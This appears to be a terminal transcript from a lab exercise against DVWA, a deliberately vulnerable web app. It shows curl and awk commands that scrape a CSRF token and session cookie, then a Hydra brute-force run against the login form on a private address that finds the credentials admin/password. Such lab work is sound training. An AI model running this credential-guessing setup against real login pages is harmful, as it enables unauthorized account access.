- [root:~]# rm -f hydra.restore; export HYDRA_PROXY_HTTP=http://127.0.0.1:8080
- [root:~]# CSRF=$(curl -s -c dvwa.cookie 192.168.1.33/DVWA/login.php | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
- [root:~]# SESSIONID=$(grep PHPSESSID dvwa.cookie | awk -F ' ' '{print $7}')
- [root:~]#
- [root:~]# hydra -l admin -p password -e ns -u -F -t 1 -w 10 -W 1 -V 192.168.1.33 http-post-form "/DVWA/login.php:username=^USER^&password=^PASS^&user_token=${CSRF}&Login=Login:S=Location\: index.php:H=Cookie: security=impossible; PHPSESSID=${SESSIONID}"
- Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2015-10-15 21:51:22
- [INFO] Using HTTP Proxy: http://127.0.0.1:8080
- [INFORMATION] escape sequence \: detected in module option, no parameter verification is performed.
- [DATA] max 1 task per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task
- [DATA] attacking service http-post-form on port 80
- [ATTEMPT] target 192.168.1.33 - login "admin" - pass "admin" - 1 of 3 [child 0]
- [ATTEMPT] target 192.168.1.33 - login "admin" - pass "" - 2 of 3 [child 0]
- [ATTEMPT] target 192.168.1.33 - login "admin" - pass "password" - 3 of 3 [child 0]
- [80][http-post-form] host: 192.168.1.33 login: admin password: password
- [STATUS] attack finished for 192.168.1.33 (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2015-10-15 21:51:50
- [root:~]#